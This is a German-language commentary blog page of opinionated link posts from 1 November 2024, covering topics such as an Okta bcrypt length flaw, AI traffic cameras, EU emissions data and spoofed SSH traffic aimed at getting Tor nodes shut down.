Das klingt jetzt gerade nicht wie ein Buffer Overflow, eher das Gegenteil. Die kleben drei Strings hintereinander, der dritte ist das Passwort. Aber bcrypt hat ein Limit von 56 Bytes. Am Anfang ist die User-ID, die packen sie offenbar als 32-bit-Integer in das bcrypt rein. Bleiben besagte 52 Zeichen, wenn man noch nie von UTF-8 gehört hat. Fucking Amis ey.
Einmal mit Profis arbeiten!
Update: Die sind übrigens nicht völlig unfähig bei Okta. Die Krisenkommunikations-Abteilung ist top notch. Die haben wie beim letzten Mal schön alles zurückgehalten bis Freitag nach Dienstschluss. Schön den Schaden maximieren, und hoffen, dass das am Wochenende verdampft, bis die Leute am Montag andere Dinge zu tun haben.

Fri Nov 1 2024

[l] Die Gesellschaft für Informatik warnt vor Cloud-Projekten, speziell bei Microsoft.
Na DAS fiel denen ja früh auf!1!! Nächstes mal vielleicht, hear me out, vorher warnen?
[l] IDC findet heraus, dass bei Cloud-Projekte häufig die Kosten explodieren. Ach. Sag bloß.
Das war IDC, nicht die CIA. Aber grämt euch nicht. IDC hat schon eine Idee, wohin die eingesparte Kohle gehen sollte.
Becoming an AI-fueled business
AI Use Case Discovery Tool
Tuning Your Cybersecurity with AI
Ich amüsiere mich ja über die Schamlosigkeit hinter dem AI Use Case Discovery Tool. Wenn der Nutzen so unklar ist, dass du ein Tool brauchst, um überhaupt nutzbringende Szenarien zu entdecken, dann solltest du das am besten gar nicht machen. Ich verrate hier mal ein Geheimnis: Die Szenarien sind vor allem für die Verkäufer nutzbringend.
[l] Wie sieht eigentlich so ein Klimawandel aus?
Die ESA hat eine Visualisierung in Form von Satellitenfotos vorher-nachher von Valencia. *grusel*
[l] Aus der Kategorie "Kernkraft ist billig und gut für die Umwelt", heute: England!
The cost of cleaning up Sellafield is expected to spiral to £136bn and Europe’s biggest nuclear waste dump cannot show how it offers taxpayers value for money, the public spending watchdog has said.
Achtung: billion. 136 billion. Pfund. Nicht Millionen. Milliarden.
Money Quote:
Europe’s most hazardous industrial site has previously been described by a former UK secretary of state as a “bottomless pit of hell, money and despair”.
Oh und sie hatten letztens auch ein Cyber-Cyber-Problem. Klar. Der Teufel scheißt gerne auf den größten Haufen.
[l] Angesichts Frankreichs "KI"-Radarfallen fragt ihr euch vielleicht, ob es da schon Erfahrungen aus anderen Ländern zu gibt.
Gibt es, aus den Niederlanden. Lief ungefähr so, wie ihr wahrscheinlich angenommen habt.
Am Kopf kratzen bringt 380 Euro Strafe: KI versagt als Straßenpolizist
Die "KI" hat da ein Handy hinhalluziniert. Natürlich sind die Niederländer vorsichtig und tun genau das, was alle AI Bros immer sagen: Ein Mensch kontrolliert das nach.
Und dann passierte, was immer passiert, wenn ein Computer etwas tut und der Mensch das kontrollieren soll. Der Mensch denkt sich: Der Computer wird schon wissen, was er tut. Ich mach mal Wochenende.
Die größte Lüge bei der "KI" ist nicht, dass die "KI" schon funktionieren wird, sondern die Entscheidung am Ende bei Menschen liegen wird, die das nachkontrollieren. NIEMAND kontrolliert irgendwas nach! Könnt ihr ja ganz leicht an euch selbst testen. Wie oft guckt ihr in euren Spamordner?
Update: Ach gucke mal, der immer wieder großartige Cory Doctorow hat auch gerade was zu der Frage der menschlichen Überwachung von "KI" geschrieben. Der Mann kan ja echt mit Worten umgehen, spricht hier von einer "moralischen Knautschzone". Gänsehaut!
[l] Der Mitarbeiter-des-Monats-Award geht an den Mitarbeiter des Weißen Hauses, der diese elegante Lösung gefunden hat:
Biden sagte dem von den offiziellen Stenografen des Weißen Hauses vorbereiteten Transkript zufolge im Gespräch mit einer Latino-Gruppe am Dienstagabend: "Der einzige Müll, den ich da draußen treiben sehe, sind seine Anhänger." Und: "Seine Dämonisierung von Latinos ist skrupellos und unamerikanisch." Das vom Pressebüro des Weißen Hauses veröffentlichte Transkript indes wurde um einen Apostroph ergänzt, das die Bedeutung des Satzes im Englischen entscheidend ändert. Statt "supporters" (Unterstützer/Anhänger) steht dort "supporter's". Damit würde die Übersetzung des Satzes lauten: "Der einzige Müll, den ich da draußen treiben sehe, ist der seiner Anhänger."
Wenn wir schon am Nitpicken sind: Das müsste supporters' heißen, außer Trump hat nur einen Supporter. Das wäre natürlich auch witzig, wenn das ein Seitenhieb auf Elon Musk mit seinem ganzen Weltraumschrott gewesen wäre, der jetzt die Astronomen behindert.
[l] Das Selbstbestimmungsgesetz ist ab heute in Kraft.
Von diesem 1. November an können volljährige Personen (ab 18 Jahren) nach dem neuen deutschen Selbstbestimmungsgesetz ihren Namen und ihr Geschlecht in amtlichen Unterlagen ändern oder die Geschlechtsmarkierung ganz streichen lassen. Auch der Vorname kann problemlos der Geschlechtsidentität entsprechend angepasst werden. Zwischen der Antragstellung und der Abgabe der persönlichen Erklärung müssen drei Monate vergehen. Die bislang vorgeschriebenen psychiatrischen Gutachten und gerichtlichen Anhörungen entfallen.
[l] Die Europäische Kommission verbreitet gute Nachrichten.
The European Commission has published today the 2024 Climate Action Progress Report, showing that net EU greenhouse gas (GHG) emissions fell by 8.3% in 2023 compared to the previous year. This is the largest annual drop in decades, with the exception of 2020 when COVID-19 led to emission cuts of 9.8%. Net GHG emissions are now 37% below 1990 levels, while GDP grew by 68% over the same period, showing the continued decoupling of emissions and economic growth. The EU remains on track to reach its commitment to reduce emissions by at least 55% by 2030.
Vor allem der Kohleausstieg hat das bewirkt. Sie halten ihren Emissionshandel auch für ein Erfolgsmodell, weil die Industrie, die am meisten betroffen war, auch am meisten Emissionen eingespart hat.
Ich bin mal gespannt, wo da der Pferdefuß ist. Eine Warnlampe ist, dass sie mal mit 1990 vergleich, mal mit 2005 und mal mit 2022. Das schmeckt ein bisschen nach Cherry Picking.
Update: Ein Leser kommentiert:
der von Dir vermutete Pferdefuß bei der GHG-Wachstums-Rechnung hängt hier:
Es wurden sämtliche Euros des Wirtschaftswachstums von 1990 bis 2022 addiert, aber nicht sämtliches dafür produziertes CO2. Da wurden nur einzelne Werte verglichen.
[l] Frankreich baut jetzt "Super-Radarfallen", die nicht nur die Geschwindigkeit sondern auch Gurtpflicht, Handyverbot am Steuer und Abstand zum Vorauto prüfen und Knöllchen verschicken können.
Money Quote:
Radargeräte der neuesten Generation könnten mithilfe künstlicher Intelligenz in die Lage versetzt werden, automatisiert auch weitere Verstöße zu erfassen, zitierte der Sender France Info aus den Regierungsplänen.
Mit "KI" wird alles besser!!1!
[l] Habt ihr auf euren Servern ständig SSH-Verbindungsversuche von irgendwo aus dem Internet?
Schickt ihr da immer schön einen Abuse-Report an den ISP?
Dann seid ihr möglicherweise Teil eines konzertierten Angriffs gegen das Tor-Netzwerk. Stellt sich raus: Da laufen lauter SYN-Pakete zu Port 22 durchs Internet, mit gespoofter Absenderadresse von Tor-Nodes (nicht nur Exit Nodes!).
Ergebnis: Ein ständiger Strom aus Abuse-Reports bei den Hostern, und mehrere Nodes sind auch schon abgeschaltet worden deswegen. Auf der Tor-Mailingliste gibt es auch Sichtungen des Phänomens. (Danke, Knuth)
[l] Habt ihr das auch gehört? Riesiger Krankenstand plötzlich? Die Arbeitgeber nagen so gut wie an der Insolvenz?!
Nun, dafür gibt es eine einfache Erklärung:
„Dabei sind die Zahlen wahrscheinlich gar nicht drastisch gestiegen“, ist der Leiter des ZEW-Forschungsbereichs „Arbeitsmärkte und Sozialversicherungen“, Nicolas Ziebarth, überzeugt. Vielmehr seien sie Folge eines „statistischen Erfassungseffektes“.
Ach. Ach was? Wie kann denn das sein?!
„Seitdem die Arbeitsunfähigkeitsbescheinigungen (AU) seit 2022 elektronisch erfasst werden, werden auch die Krankenstände viel besser und genauer erfasst“, sagte Ziebarth dieser Redaktion. Zuvor landeten viele gelbe Zettel, die erkrankte Arbeitnehmer von ihren Ärzten erhalten haben, erst gar nicht beim Arbeitgeber, sodass diese dann auch nicht registriert wurden.
Da fällt es einem doch wie Schuppen aus den Haaren!1!!
Update: Ein Leser korrigiert:
da ist dem Redakteur ein Fehler unterlaufen. Der Arbeitgeber hat den Zettel meist bekommen, für den hat der Mitarbeiter den ja geholt. Die Kopie für die Krankenkasse, bei der die Statistik gemacht wird, blieb gerne mal liegen.
(Danke, Frank)

früher -- aktuell -- später

Proudly made without AI, Blockchain, PHP, Java, Perl, MySQL and Postgres
Impressum, Datenschutz